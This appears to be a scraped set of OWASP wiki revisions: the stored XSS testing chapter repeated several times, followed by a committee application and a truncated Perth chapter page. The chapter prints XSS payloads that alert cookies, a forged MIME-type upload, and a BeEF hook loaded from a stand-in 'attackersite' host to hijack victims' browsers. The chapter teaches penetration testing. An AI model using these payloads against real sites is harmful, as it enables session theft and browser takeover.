If the web application allows file upload, it is important to check if it is possible to upload HTML content. For instance, if HTML or TXT files are allowed, XSS payload can be injected in the file uploaded. The pen-tester should also verify if the file upload allows setting arbitrary MIME types.

Consider the following HTTP POST request for file upload:

<pre>
POST /fileupload.aspx HTTP/1.1
[…]

Content-Disposition: form-data; name="uploadfile1"; filename="C:\Documents and Settings\test\Desktop\test.txt"
Content-Type: text/plain

test
</pre>

This design flaw can be exploited in browser MIME mishandling attacks. For instance, innocuous-looking files like JPG and GIF can contain an XSS payload that is executed when they are loaded by the browser. This is possible when the MIME type for an image such as image/gif can instead be set to text/html. In this case the file will be treated by the client browser as HTML.

HTTP POST Request forged:
<pre>
Content-Disposition: form-data; name="uploadfile1"; filename="C:\Documents and Settings\test\Desktop\test.gif"
Content-Type: text/html

<script>alert(document.cookie)</script>
</pre>

Also consider that Internet Explorer does not handle MIME types in the same way as Mozilla Firefox or other browsers do. For instance, Internet Explorer handles TXT files with HTML content as HTML content. For further information about MIME handling, refer to the whitepapers section at the bottom of this chapter.

== Gray Box testing and example ==
Gray Box testing is similar to Black box testing. In gray box testing, the pen-tester has partial knowledge of the application. In this case, information regarding user input, input validation controls, and data storage might be known by the pen-tester.

Depending on the information available, it is normally recommended that testers check how user input is processed by the application and then stored into the back-end system. The following steps are recommended:

* Use front-end application and enter input with special/invalid characters
* Analyze application response(s)
* Identify presence of input validation controls
* Access back-end system and check if input is stored and how it is stored
* Analyze source code and understand how stored input is rendered by the application

If source code is available (White Box), all variables used in input forms should be analyzed.

In particular, programming languages such as PHP, ASP, and JSP make use of predefined variables/functions to store input from HTTP GET and POST requests.

The following table summarizes some special variables and functions to look at when analyzing source code:

<blockquote style="background: white; border: 1px solid rgb(153, 153, 153); padding: 1em;">
{| class="wikitable" style="margin: 1em auto 1em auto"
| '''PHP''' || '''ASP''' || '''JSP'''
|-
|
* $_GET - HTTP GET variables
* $_POST - HTTP POST variables
* $_REQUEST – http POST, GET and COOKIE variables
* $_FILES - HTTP File Upload variables
||
* Request.QueryString - HTTP GET
* Request.Form - HTTP POST
* Server.CreateObject - used to upload files
||
* doGet, doPost servlets - HTTP GET and POST
* request.getParameter - HTTP GET/POST variables
|}
</blockquote>

Note: The table above is only a summary of the most important parameters but, all user input parameters should be investigated.

== References ==
'''OWASP Resources''' 
*[[XSS Filter Evasion Cheat Sheet]]

'''Books''' 
* Joel Scambray, Mike Shema, Caleb Sima - "Hacking Exposed Web Applications", Second Edition, McGraw-Hill, 2006 - ISBN 0-07-226229-0
* Dafydd Stuttard, Marcus Pinto - "The Web Application's Handbook - Discovering and Exploiting Security Flaws", 2008, Wiley, ISBN 978-0-470-17077-9
* Jeremiah Grossman, Robert "RSnake" Hansen, Petko "pdp" D. Petkov, Anton Rager, Seth Fogie - "Cross Site Scripting Attacks: XSS Exploits and Defense", 2007, Syngress, ISBN-10: 1-59749-154-3

'''Whitepapers''' 
* RSnake: "XSS (Cross Site Scripting) Cheat Sheet" - http://ha.ckers.org/xss.html

* CERT: "CERT Advisory CA-2000-02 Malicious HTML Tags Embedded in Client Web Requests" - http://www.cert.org/advisories/CA-2000-02.html

* Amit Klein: "Cross-site Scripting Explained" - http://courses.csail.mit.edu/6.857/2009/handouts/css-explained.pdf

* Gunter Ollmann: "HTML Code Injection and Cross-site Scripting" - http://www.technicalinfo.net/papers/CSS.html

* CGISecurity.com: "The Cross Site Scripting FAQ" - http://www.cgisecurity.com/xss-faq.html

* Blake Frantz: "Flirting with MIME Types: A Browser's Perspective" - http://www.leviathansecurity.com/pdf/Flirting%20with%20MIME%20Types.pdf

'''Tools''' 
* '''[[OWASP CAL9000 Project|OWASP CAL9000]]'''
CAL9000 includes a sortable implementation of RSnake's XSS Attacks, Character Encoder/Decoder, HTTP Request Generator and Response Evaluator, Testing Checklist, Automated Attack Editor and much more.

* '''PHP Charset Encoder(PCE)''' - http://h4k.in/encoding
PCE helps you encode arbitrary texts to and from 65 kinds of character sets that you can use in your customized payloads.

* '''Hackvertor''' - http://www.businessinfo.co.uk/labs/hackvertor/hackvertor.php
Hackvertor is an online tool which allows many types of encoding and obfuscation of JavaScript (or any string input).

* '''BeEF''' - http://www.beefproject.com
BeEF is the browser exploitation framework. A professional tool to demonstrate the real-time impact of browser vulnerabilities.

* '''XSS-Proxy''' - http://xss-proxy.sourceforge.net/
XSS-Proxy is an advanced Cross-Site-Scripting (XSS) attack tool.

* '''Backframe''' - http://www.gnucitizen.org/projects/backframe/
Backframe is a full-featured attack console for exploiting WEB browsers, WEB users, and WEB applications.

* '''[[OWASP WebScarab Project|WebScarab]]'''
WebScarab is a framework for analyzing applications that communicate using the HTTP and HTTPS protocols.

* '''Burp''' - http://portswigger.net/burp/
Burp Proxy is an interactive HTTP/S proxy server for attacking and testing web applications.

* '''XSS Assistant''' - http://www.greasespot.net/
Greasemonkey script that allow users to easily test any web application for cross-site-scripting flaws.

* '''OWASP Zed Attack Proxy (ZAP)''' - [[OWASP_Zed_Attack_Proxy_Project]]
ZAP is an easy to use integrated penetration testing tool for finding vulnerabilities in web applications. It is designed to be used by people with a wide range of security experience and as such is ideal for developers and functional testers who are new to penetration testing. ZAP provides automated scanners as well as a set of tools that allow you to find security vulnerabilities manually.

Testing for Stored Cross site scripting (OTG-INPVAL-002)

2013-01-09T12:11:25Z

Xntrik: Updated link to beef - there's still a few updates that could be performed here - such as showing the modern/ruby beef

{{Template:OWASP Testing Guide v4}}

== Brief Summary ==
Stored [[Cross-site Scripting (XSS)]] is the most dangerous type of Cross Site Scripting. Web applications that allow users to store data are potentially exposed to this type of attack. This chapter illustrates examples of stored cross site scripting injection and related exploitation scenarios.

== Description of the Issue ==
Stored XSS occurs when a web application gathers input from a user which might be malicious, and then stores that input in a data store for later use. The input that is stored is not correctly filtered. As a consequence, the malicious data will appear to be part of the web site and run within the user’s browser under the privileges of the web application. Since this vulnerability typically involves at least two requests to the application, this may also called second-order XSS.

This vulnerability can be used to conduct a number of browser-based attacks including:

* Hijacking another user's browser
* Capturing sensitive information viewed by application users
* Pseudo defacement of the application
* Port scanning of internal hosts ("internal" in relation to the users of the web application)
* Directed delivery of browser-based exploits
* Other malicious activities

Stored XSS does not need a malicious link to be exploited. A successful exploitation occurs when a user visits a page with a stored XSS. The following phases relate to a typical stored XSS attack scenario:

* Attacker stores malicious code into the vulnerable page
* User authenticates in the application
* User visits vulnerable page
* Malicious code is executed by the user's browser

 This type of attack can also be exploited with browser exploitation frameworks such as [http://www.beefproject.com BeEF], [http://xss-proxy.sourceforge.net/ XSS Proxy] and [http://www.gnucitizen.org/projects/backframe/ Backframe]. These frameworks allow for complex JavaScript exploit development.

Stored XSS is particularly dangerous in application areas where users with high privileges have access. When the administrator visits the vulnerable page, the attack is automatically executed by their browser. This might expose sensitive information such as session authorization tokens.

== Black Box testing and example ==

The process for identifying stored XSS vulnerabilities is similar to the process described during the [[Testing for Reflected Cross site scripting (OWASP-DV-001)|testing for reflected XSS]].

'''Input Forms'''

The first step is to identify all points where user input is stored into the back-end and then displayed by the application. Typical examples of stored user input can be found in:

* User/Profiles page: the application allows the user to edit/change profile details such as first name, last name, nickname, avatar, picture, address, etc.
* Shopping cart: the application allows the user to store items into the shopping cart which can then be reviewed later
* File Manager: application that allows upload of files
* Application settings/preferences: application that allows the user to set preferences
* Forum/Message board: application that permits exchange of posts among users
* Blog: if the blog application permits to users submitting comments
* Log: if the application stores some users input into logs.

'''Analyze HTML code'''

Input stored by the application is normally used in HTML tags, but it can also be found as part of JavaScript content. At this stage, it is fundamental to understand if input is stored and how it is positioned in the context of the page. Differently from reflected XSS, the pen-tester should also investigate any out-of-band channels through which the application receives and stores users input.
 
Note: All areas of the application accessible by administrators should be tested to identify the presence of any data submitted by users.

Example: Email stored data in index2.php

[[Image:Stored_input_example.jpg]]

The HTML code of index2.php where the email value is located:

<pre>
<input class="inputbox" type="text" name="email" size="40" value="aaa@aa.com" />
</pre>

In this case, the pen-tester needs to find a way to inject code outside the <input> tag as below:

<pre>
<input class="inputbox" type="text" name="email" size="40" value="aaa@aa.com"> MALICIOUS CODE <!-- />
</pre>

'''Testing for Stored XSS'''

This involves testing the input validation/filtering controls of the application. Basic injection examples in this case:

<pre>aaa@aa.com"><script>alert(document.cookie)</script></pre>
<pre>aaa@aa.com%22%3E%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E</pre>

Ensure the input is submitted through the application. This normally involves disabling JavaScript if client-side security controls are implemented or modifying the HTTP request with a web proxy such as [[OWASP WebScarab Project|WebScarab]]. It is also important to test the same injection with both HTTP GET and POST requests. The above injection results in a popup window containing the cookie values.

'''Result Expected''':

[[Image:Stored_xss_example.jpg]]

The HTML code following the injection:

<pre><input class="inputbox" type="text" name="email" size="40" value="aaa@aa.com"><script>alert(document.cookie)</script></pre>
The input is stored and the XSS payload is executed by the browser when reloading the page. 
If the input is escaped by the application, testers should test the application for XSS filters. For instance, if the string "SCRIPT" is replaced by a space or by a NULL character then this could be a potential sign of XSS filtering in action. Many techniques exist in order to evade input filters (see [[Testing for Reflected Cross site scripting (OWASP-DV-001)|testing for reflected XSS]] chapter). It is strongly recommended that testers refer to [[XSS Filter Evasion Cheat Sheet|XSS Filter Evasion]] , [http://ha.ckers.org/xss.html RSnake] and [https://h4k.in/encoding/ Mario] XSS Cheat pages which provide an extensive list of XSS attacks and filtering bypasses. Refer to the whitepapers/tools section for more detailed information.

'''Leverage Stored XSS with BeEF'''

Stored XSS can be exploited by advanced JavaScript exploitation frameworks such as [http://www.beefproject.com BeEF], [http://xss-proxy.sourceforge.net/ XSS Proxy] and [http://www.gnucitizen.org/projects/backframe/ Backframe]. Let’s see what a typical BeEF exploitation scenario involves:

* Injecting a JavaScript hook which communicates to the attacker's browser exploitation framework (BeEF)
* Waiting for the application user to view the vulnerable page where the stored input is displayed
* Control the application user’s browser via the BeEF console

The JavaScript hook can be injected by exploiting the XSS vulnerability in the web application.

Example: BeEF Injection in index2.php:

<pre>aaa@aa.com”><script src=http://attackersite/beef/hook/beefmagic.js.php></script></pre>

When the user loads the page index2.php, the script beefmagic.js.php is executed by the browser. It is then possible to access cookies, user screenshot, user clipboard, and launch complex XSS attacks.

'''Result Expected'''

[[Image:BeEF_in_action.jpg]]

This attack is particularly effective in vulnerable pages that are viewed by many users with different privileges.

'''File Upload'''

If the web application allows file upload, it is important to check if it is possible to upload HTML content. For instance, if HTML or TXT files are allowed, XSS payload can be injected in the file uploaded. The pen-tester should also verify if the file upload allows setting arbitrary MIME types.

Consider the following HTTP POST request for file upload:

<pre>
POST /fileupload.aspx HTTP/1.1
[…]

Content-Disposition: form-data; name="uploadfile1"; filename="C:\Documents and Settings\test\Desktop\test.txt"
Content-Type: text/plain

test
</pre>

This design flaw can be exploited in browser MIME mishandling attacks. For instance, innocuous-looking files like JPG and GIF can contain an XSS payload that is executed when they are loaded by the browser. This is possible when the MIME type for an image such as image/gif can instead be set to text/html. In this case the file will be treated by the client browser as HTML.

HTTP POST Request forged:
<pre>
Content-Disposition: form-data; name="uploadfile1"; filename="C:\Documents and Settings\test\Desktop\test.gif"
Content-Type: text/html

<script>alert(document.cookie)</script>
</pre>

Also consider that Internet Explorer does not handle MIME types in the same way as Mozilla Firefox or other browsers do. For instance, Internet Explorer handles TXT files with HTML content as HTML content. For further information about MIME handling, refer to the whitepapers section at the bottom of this chapter.

== Gray Box testing and example ==
Gray Box testing is similar to Black box testing. In gray box testing, the pen-tester has partial knowledge of the application. In this case, information regarding user input, input validation controls, and data storage might be known by the pen-tester.

Depending on the information available, it is normally recommended that testers check how user input is processed by the application and then stored into the back-end system. The following steps are recommended:

* Use front-end application and enter input with special/invalid characters
* Analyze application response(s)
* Identify presence of input validation controls
* Access back-end system and check if input is stored and how it is stored
* Analyze source code and understand how stored input is rendered by the application

If source code is available (White Box), all variables used in input forms should be analyzed.

In particular, programming languages such as PHP, ASP, and JSP make use of predefined variables/functions to store input from HTTP GET and POST requests.

The following table summarizes some special variables and functions to look at when analyzing source code:

<blockquote style="background: white; border: 1px solid rgb(153, 153, 153); padding: 1em;">
{| class="wikitable" style="margin: 1em auto 1em auto"
| '''PHP''' || '''ASP''' || '''JSP'''
|-
|
* $_GET - HTTP GET variables
* $_POST - HTTP POST variables
* $_REQUEST – http POST, GET and COOKIE variables
* $_FILES - HTTP File Upload variables
||
* Request.QueryString - HTTP GET
* Request.Form - HTTP POST
* Server.CreateObject - used to upload files
||
* doGet, doPost servlets - HTTP GET and POST
* request.getParameter - HTTP GET/POST variables
|}
</blockquote>

Note: The table above is only a summary of the most important parameters but, all user input parameters should be investigated.

== References ==
'''OWASP Resources''' 
*[[XSS Filter Evasion Cheat Sheet]]

'''Books''' 
* Joel Scambray, Mike Shema, Caleb Sima - "Hacking Exposed Web Applications", Second Edition, McGraw-Hill, 2006 - ISBN 0-07-226229-0
* Dafydd Stuttard, Marcus Pinto - "The Web Application's Handbook - Discovering and Exploiting Security Flaws", 2008, Wiley, ISBN 978-0-470-17077-9
* Jeremiah Grossman, Robert "RSnake" Hansen, Petko "pdp" D. Petkov, Anton Rager, Seth Fogie - "Cross Site Scripting Attacks: XSS Exploits and Defense", 2007, Syngress, ISBN-10: 1-59749-154-3

'''Whitepapers''' 
* RSnake: "XSS (Cross Site Scripting) Cheat Sheet" - http://ha.ckers.org/xss.html

* CERT: "CERT Advisory CA-2000-02 Malicious HTML Tags Embedded in Client Web Requests" - http://www.cert.org/advisories/CA-2000-02.html

* Amit Klein: "Cross-site Scripting Explained" - http://courses.csail.mit.edu/6.857/2009/handouts/css-explained.pdf

* Gunter Ollmann: "HTML Code Injection and Cross-site Scripting" - http://www.technicalinfo.net/papers/CSS.html

* CGISecurity.com: "The Cross Site Scripting FAQ" - http://www.cgisecurity.com/xss-faq.html

* Blake Frantz: "Flirting with MIME Types: A Browser's Perspective" - http://www.leviathansecurity.com/pdf/Flirting%20with%20MIME%20Types.pdf

'''Tools''' 
* '''[[OWASP CAL9000 Project|OWASP CAL9000]]'''
CAL9000 includes a sortable implementation of RSnake's XSS Attacks, Character Encoder/Decoder, HTTP Request Generator and Response Evaluator, Testing Checklist, Automated Attack Editor and much more.

* '''PHP Charset Encoder(PCE)''' - http://h4k.in/encoding
PCE helps you encode arbitrary texts to and from 65 kinds of character sets that you can use in your customized payloads.

* '''Hackvertor''' - http://www.businessinfo.co.uk/labs/hackvertor/hackvertor.php
Hackvertor is an online tool which allows many types of encoding and obfuscation of JavaScript (or any string input).

* '''BeEF''' - http://www.bindshell.net/tools/beef/
BeEF is the browser exploitation framework. A professional tool to demonstrate the real-time impact of browser vulnerabilities.

* '''XSS-Proxy''' - http://xss-proxy.sourceforge.net/
XSS-Proxy is an advanced Cross-Site-Scripting (XSS) attack tool.

* '''Backframe''' - http://www.gnucitizen.org/projects/backframe/
Backframe is a full-featured attack console for exploiting WEB browsers, WEB users, and WEB applications.

* '''[[OWASP WebScarab Project|WebScarab]]'''
WebScarab is a framework for analyzing applications that communicate using the HTTP and HTTPS protocols.

* '''Burp''' - http://portswigger.net/burp/
Burp Proxy is an interactive HTTP/S proxy server for attacking and testing web applications.

* '''XSS Assistant''' - http://www.greasespot.net/
Greasemonkey script that allow users to easily test any web application for cross-site-scripting flaws.

* '''OWASP Zed Attack Proxy (ZAP)''' - [[OWASP_Zed_Attack_Proxy_Project]]
ZAP is an easy to use integrated penetration testing tool for finding vulnerabilities in web applications. It is designed to be used by people with a wide range of security experience and as such is ideal for developers and functional testers who are new to penetration testing. ZAP provides automated scanners as well as a set of tools that allow you to find security vulnerabilities manually.

Testing for Stored Cross site scripting (OTG-INPVAL-002)

2013-01-09T12:10:07Z

Xntrik: Updated the link to beefproject.com

{{Template:OWASP Testing Guide v4}}

== Brief Summary ==
Stored [[Cross-site Scripting (XSS)]] is the most dangerous type of Cross Site Scripting. Web applications that allow users to store data are potentially exposed to this type of attack. This chapter illustrates examples of stored cross site scripting injection and related exploitation scenarios.

== Description of the Issue ==
Stored XSS occurs when a web application gathers input from a user which might be malicious, and then stores that input in a data store for later use. The input that is stored is not correctly filtered. As a consequence, the malicious data will appear to be part of the web site and run within the user’s browser under the privileges of the web application. Since this vulnerability typically involves at least two requests to the application, this may also called second-order XSS.

This vulnerability can be used to conduct a number of browser-based attacks including:

* Hijacking another user's browser
* Capturing sensitive information viewed by application users
* Pseudo defacement of the application
* Port scanning of internal hosts ("internal" in relation to the users of the web application)
* Directed delivery of browser-based exploits
* Other malicious activities

Stored XSS does not need a malicious link to be exploited. A successful exploitation occurs when a user visits a page with a stored XSS. The following phases relate to a typical stored XSS attack scenario:

* Attacker stores malicious code into the vulnerable page
* User authenticates in the application
* User visits vulnerable page
* Malicious code is executed by the user's browser

 This type of attack can also be exploited with browser exploitation frameworks such as [http://www.beefproject.com BeEF], [http://xss-proxy.sourceforge.net/ XSS Proxy] and [http://www.gnucitizen.org/projects/backframe/ Backframe]. These frameworks allow for complex JavaScript exploit development.

Stored XSS is particularly dangerous in application areas where users with high privileges have access. When the administrator visits the vulnerable page, the attack is automatically executed by their browser. This might expose sensitive information such as session authorization tokens.

== Black Box testing and example ==

The process for identifying stored XSS vulnerabilities is similar to the process described during the [[Testing for Reflected Cross site scripting (OWASP-DV-001)|testing for reflected XSS]].

'''Input Forms'''

The first step is to identify all points where user input is stored into the back-end and then displayed by the application. Typical examples of stored user input can be found in:

* User/Profiles page: the application allows the user to edit/change profile details such as first name, last name, nickname, avatar, picture, address, etc.
* Shopping cart: the application allows the user to store items into the shopping cart which can then be reviewed later
* File Manager: application that allows upload of files
* Application settings/preferences: application that allows the user to set preferences
* Forum/Message board: application that permits exchange of posts among users
* Blog: if the blog application permits to users submitting comments
* Log: if the application stores some users input into logs.

'''Analyze HTML code'''

Input stored by the application is normally used in HTML tags, but it can also be found as part of JavaScript content. At this stage, it is fundamental to understand if input is stored and how it is positioned in the context of the page. Differently from reflected XSS, the pen-tester should also investigate any out-of-band channels through which the application receives and stores users input.
 
Note: All areas of the application accessible by administrators should be tested to identify the presence of any data submitted by users.

Example: Email stored data in index2.php

[[Image:Stored_input_example.jpg]]

The HTML code of index2.php where the email value is located:

<pre>
<input class="inputbox" type="text" name="email" size="40" value="aaa@aa.com" />
</pre>

In this case, the pen-tester needs to find a way to inject code outside the <input> tag as below:

<pre>
<input class="inputbox" type="text" name="email" size="40" value="aaa@aa.com"> MALICIOUS CODE <!-- />
</pre>

'''Testing for Stored XSS'''

This involves testing the input validation/filtering controls of the application. Basic injection examples in this case:

<pre>aaa@aa.com"><script>alert(document.cookie)</script></pre>
<pre>aaa@aa.com%22%3E%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E</pre>

Ensure the input is submitted through the application. This normally involves disabling JavaScript if client-side security controls are implemented or modifying the HTTP request with a web proxy such as [[OWASP WebScarab Project|WebScarab]]. It is also important to test the same injection with both HTTP GET and POST requests. The above injection results in a popup window containing the cookie values.

'''Result Expected''':

[[Image:Stored_xss_example.jpg]]

The HTML code following the injection:

<pre><input class="inputbox" type="text" name="email" size="40" value="aaa@aa.com"><script>alert(document.cookie)</script></pre>
The input is stored and the XSS payload is executed by the browser when reloading the page. 
If the input is escaped by the application, testers should test the application for XSS filters. For instance, if the string "SCRIPT" is replaced by a space or by a NULL character then this could be a potential sign of XSS filtering in action. Many techniques exist in order to evade input filters (see [[Testing for Reflected Cross site scripting (OWASP-DV-001)|testing for reflected XSS]] chapter). It is strongly recommended that testers refer to [[XSS Filter Evasion Cheat Sheet|XSS Filter Evasion]] , [http://ha.ckers.org/xss.html RSnake] and [https://h4k.in/encoding/ Mario] XSS Cheat pages which provide an extensive list of XSS attacks and filtering bypasses. Refer to the whitepapers/tools section for more detailed information.

'''Leverage Stored XSS with BeEF'''

Stored XSS can be exploited by advanced JavaScript exploitation frameworks such as [http://www.bindshell.net/tools/beef BeEF], [http://xss-proxy.sourceforge.net/ XSS Proxy] and [http://www.gnucitizen.org/projects/backframe/ Backframe]. Let’s see what a typical BeEF exploitation scenario involves:

* Injecting a JavaScript hook which communicates to the attacker's browser exploitation framework (BeEF)
* Waiting for the application user to view the vulnerable page where the stored input is displayed
* Control the application user’s browser via the BeEF console

The JavaScript hook can be injected by exploiting the XSS vulnerability in the web application.

Example: BeEF Injection in index2.php:

<pre>aaa@aa.com”><script src=http://attackersite/beef/hook/beefmagic.js.php></script></pre>

When the user loads the page index2.php, the script beefmagic.js.php is executed by the browser. It is then possible to access cookies, user screenshot, user clipboard, and launch complex XSS attacks.

'''Result Expected'''

[[Image:BeEF_in_action.jpg]]

This attack is particularly effective in vulnerable pages that are viewed by many users with different privileges.

'''File Upload'''

If the web application allows file upload, it is important to check if it is possible to upload HTML content. For instance, if HTML or TXT files are allowed, XSS payload can be injected in the file uploaded. The pen-tester should also verify if the file upload allows setting arbitrary MIME types.

Consider the following HTTP POST request for file upload:

<pre>
POST /fileupload.aspx HTTP/1.1
[…]

Content-Disposition: form-data; name="uploadfile1"; filename="C:\Documents and Settings\test\Desktop\test.txt"
Content-Type: text/plain

test
</pre>

This design flaw can be exploited in browser MIME mishandling attacks. For instance, innocuous-looking files like JPG and GIF can contain an XSS payload that is executed when they are loaded by the browser. This is possible when the MIME type for an image such as image/gif can instead be set to text/html. In this case the file will be treated by the client browser as HTML.

HTTP POST Request forged:
<pre>
Content-Disposition: form-data; name="uploadfile1"; filename="C:\Documents and Settings\test\Desktop\test.gif"
Content-Type: text/html

<script>alert(document.cookie)</script>
</pre>

Also consider that Internet Explorer does not handle MIME types in the same way as Mozilla Firefox or other browsers do. For instance, Internet Explorer handles TXT files with HTML content as HTML content. For further information about MIME handling, refer to the whitepapers section at the bottom of this chapter.

== Gray Box testing and example ==
Gray Box testing is similar to Black box testing. In gray box testing, the pen-tester has partial knowledge of the application. In this case, information regarding user input, input validation controls, and data storage might be known by the pen-tester.

Depending on the information available, it is normally recommended that testers check how user input is processed by the application and then stored into the back-end system. The following steps are recommended:

* Use front-end application and enter input with special/invalid characters
* Analyze application response(s)
* Identify presence of input validation controls
* Access back-end system and check if input is stored and how it is stored
* Analyze source code and understand how stored input is rendered by the application

If source code is available (White Box), all variables used in input forms should be analyzed.

In particular, programming languages such as PHP, ASP, and JSP make use of predefined variables/functions to store input from HTTP GET and POST requests.

The following table summarizes some special variables and functions to look at when analyzing source code:

<blockquote style="background: white; border: 1px solid rgb(153, 153, 153); padding: 1em;">
{| class="wikitable" style="margin: 1em auto 1em auto"
| '''PHP''' || '''ASP''' || '''JSP'''
|-
|
* $_GET - HTTP GET variables
* $_POST - HTTP POST variables
* $_REQUEST – http POST, GET and COOKIE variables
* $_FILES - HTTP File Upload variables
||
* Request.QueryString - HTTP GET
* Request.Form - HTTP POST
* Server.CreateObject - used to upload files
||
* doGet, doPost servlets - HTTP GET and POST
* request.getParameter - HTTP GET/POST variables
|}
</blockquote>

Note: The table above is only a summary of the most important parameters but, all user input parameters should be investigated.

== References ==
'''OWASP Resources''' 
*[[XSS Filter Evasion Cheat Sheet]]

'''Books''' 
* Joel Scambray, Mike Shema, Caleb Sima - "Hacking Exposed Web Applications", Second Edition, McGraw-Hill, 2006 - ISBN 0-07-226229-0
* Dafydd Stuttard, Marcus Pinto - "The Web Application's Handbook - Discovering and Exploiting Security Flaws", 2008, Wiley, ISBN 978-0-470-17077-9
* Jeremiah Grossman, Robert "RSnake" Hansen, Petko "pdp" D. Petkov, Anton Rager, Seth Fogie - "Cross Site Scripting Attacks: XSS Exploits and Defense", 2007, Syngress, ISBN-10: 1-59749-154-3

'''Whitepapers''' 
* RSnake: "XSS (Cross Site Scripting) Cheat Sheet" - http://ha.ckers.org/xss.html

* CERT: "CERT Advisory CA-2000-02 Malicious HTML Tags Embedded in Client Web Requests" - http://www.cert.org/advisories/CA-2000-02.html

* Amit Klein: "Cross-site Scripting Explained" - http://courses.csail.mit.edu/6.857/2009/handouts/css-explained.pdf

* Gunter Ollmann: "HTML Code Injection and Cross-site Scripting" - http://www.technicalinfo.net/papers/CSS.html

* CGISecurity.com: "The Cross Site Scripting FAQ" - http://www.cgisecurity.com/xss-faq.html

* Blake Frantz: "Flirting with MIME Types: A Browser's Perspective" - http://www.leviathansecurity.com/pdf/Flirting%20with%20MIME%20Types.pdf

'''Tools''' 
* '''[[OWASP CAL9000 Project|OWASP CAL9000]]'''
CAL9000 includes a sortable implementation of RSnake's XSS Attacks, Character Encoder/Decoder, HTTP Request Generator and Response Evaluator, Testing Checklist, Automated Attack Editor and much more.

* '''PHP Charset Encoder(PCE)''' - http://h4k.in/encoding
PCE helps you encode arbitrary texts to and from 65 kinds of character sets that you can use in your customized payloads.

* '''Hackvertor''' - http://www.businessinfo.co.uk/labs/hackvertor/hackvertor.php
Hackvertor is an online tool which allows many types of encoding and obfuscation of JavaScript (or any string input).

* '''BeEF''' - http://www.bindshell.net/tools/beef/
BeEF is the browser exploitation framework. A professional tool to demonstrate the real-time impact of browser vulnerabilities.

* '''XSS-Proxy''' - http://xss-proxy.sourceforge.net/
XSS-Proxy is an advanced Cross-Site-Scripting (XSS) attack tool.

* '''Backframe''' - http://www.gnucitizen.org/projects/backframe/
Backframe is a full-featured attack console for exploiting WEB browsers, WEB users, and WEB applications.

* '''[[OWASP WebScarab Project|WebScarab]]'''
WebScarab is a framework for analyzing applications that communicate using the HTTP and HTTPS protocols.

* '''Burp''' - http://portswigger.net/burp/
Burp Proxy is an interactive HTTP/S proxy server for attacking and testing web applications.

* '''XSS Assistant''' - http://www.greasespot.net/
Greasemonkey script that allow users to easily test any web application for cross-site-scripting flaws.

* '''OWASP Zed Attack Proxy (ZAP)''' - [[OWASP_Zed_Attack_Proxy_Project]]
ZAP is an easy to use integrated penetration testing tool for finding vulnerabilities in web applications. It is designed to be used by people with a wide range of security experience and as such is ideal for developers and functional testers who are new to penetration testing. ZAP provides automated scanners as well as a set of tools that allow you to find security vulnerabilities manually.

Global Conferences Committee - Application 13

2012-04-18T12:00:05Z

Xntrik: CF Recommendation for Benny

[[How to Join a Committee|Click here to return to 'How to Join a Committee' page]]

----
{| style="width:100%" border="0" align="center"
! colspan="2" align="center" style="background:#4058A0; color:white"|'''COMMITTEE APPLICATION FORM'''
|-
| style="width:25%; background:#7B8ABD" align="center"|'''Applicant's Name'''
| colspan="1" style="width:85%; background:#cccccc" align="left"|Benny Ketelslegers.
|-
| style="width:25%; background:#7B8ABD" align="center"| '''Current and past OWASP Roles'''
| colspan="1" style="width:85%; background:#cccccc" align="left"|OWASP Japan Chapter leader.
|-
| style="width:25%; background:#7B8ABD" align="center"| '''Committee Applying for'''
| colspan="1" style="width:85%; background:#cccccc" align="left"|Global Conferences Committee
|}
----
Some thoughts and the things I would like to do/achieve in the GCC:

I have been a passive member as part of the Belgian OWASP chapter since 2007 and picked up the role of chapter leader in Japan end of 2011 after encouragement of some other OWASP leaders. I'm a founding member and was co-organizer of the not-for-profit BruCON conference which was well received and today with 400+ attendees has a fairly good and positive reputation in the community. I believe I can leverage this experience and advise other people organizing any OWASP conference and event. I want to especially focus on supporting events in the APAC region as well as within Japan. I want to improve collaboration between the different chapters and organizers.

----
Please be aware that for an application to be considered by the board, '''you MUST have 5 recommendations'''.
An incomplete application will not be considered for vote.
----

----
{| style="width:100%" border="0" align="center"
! colspan="8" align="center" style="background:#4058A0; color:white"|'''COMMITTEE RECOMMENDATIONS'''
|-
! align="center" style="background:white; color:white"|
! align="center" style="background:#7B8ABD; color:white"|'''Who Recommends/Name'''
! align="center" style="background:#7B8ABD; color:white"|'''Role in OWASP'''
! align="center" style="background:#7B8ABD; color:white"|'''Recommendation Content'''
|-
| style="width:3%; background:#cccccc" align="center"|'''1'''
| style="width:20%; background:#cccccc" align="center"|Kitisak Jirawannakool
| style="width:20%; background:#cccccc" align="center"|OWASP Thailand Chapter Leader
| style="width:57%; background:#cccccc" align="center"|Benny is very active and his experience is a key success.
|-
| style="width:3%; background:#cccccc" align="center"|'''2'''
| style="width:20%; background:#cccccc" align="center"|Christian Frichot
| style="width:20%; background:#cccccc" align="center"|OWASP Perth Australia Chapter Leader
| style="width:57%; background:#cccccc" align="center"|Benny is well known within the security industry as providing a solid voice. His eagerness to represent the Asia Pacific region is something that I whole-heartedly support.
|-
| style="width:3%; background:#cccccc" align="center"|'''3'''
| style="width:20%; background:#cccccc" align="center"|
| style="width:20%; background:#cccccc" align="center"|
| style="width:57%; background:#cccccc" align="center"|
|-
| style="width:3%; background:#cccccc" align="center"|'''4'''
| style="width:20%; background:#cccccc" align="center"|
| style="width:20%; background:#cccccc" align="center"|
| style="width:57%; background:#cccccc" align="center"|
|-
| style="width:3%; background:#cccccc" align="center"|'''5'''
| style="width:20%; background:#cccccc" align="center"|
| style="width:20%; background:#cccccc" align="center"|
| style="width:57%; background:#cccccc" align="center"|
|}
----

Perth Australia

2012-03-21T13:16:06Z

Xntrik: shifting chris' talk into the previous talk section

{{Chapter Template|chaptername=Perth, Western Australia|extra=The chapter leaders are:
* [http://www.owasp.org/index.php/User:Xntrik Christian Frichot]
* [mailto:joshua@qwek.com Joshua Qwek]
* Timothy Bessant
* [mailto:david.taylor@bankwest.com.au David Taylor]|mailinglistsite=http://lists.owasp.org/mailman/listinfo/owasp-Perth|emailarchives=http://lists.owasp.org/pipermail/owasp-Perth}}

<paypal>Perth Australia</paypal>

== Upcoming OWASP Events ==

Watch this space! (We're going for 4 meetings this year folks!)

== Previous OWASP Meetings ==

=== Secure Coding and OOAD (March 2012) ===

Building on the OWASP secure coding priniciples, this session will introduce Robert C Martin's 5 OO principles in order to show how well designed code can help with the implementation and enforcement of secure coding principles, as well as alleviating maintenance headaches. Presented by Chris Arnold of Swiss power and ABB.

=== Defending Web Applications (December 2011) ===

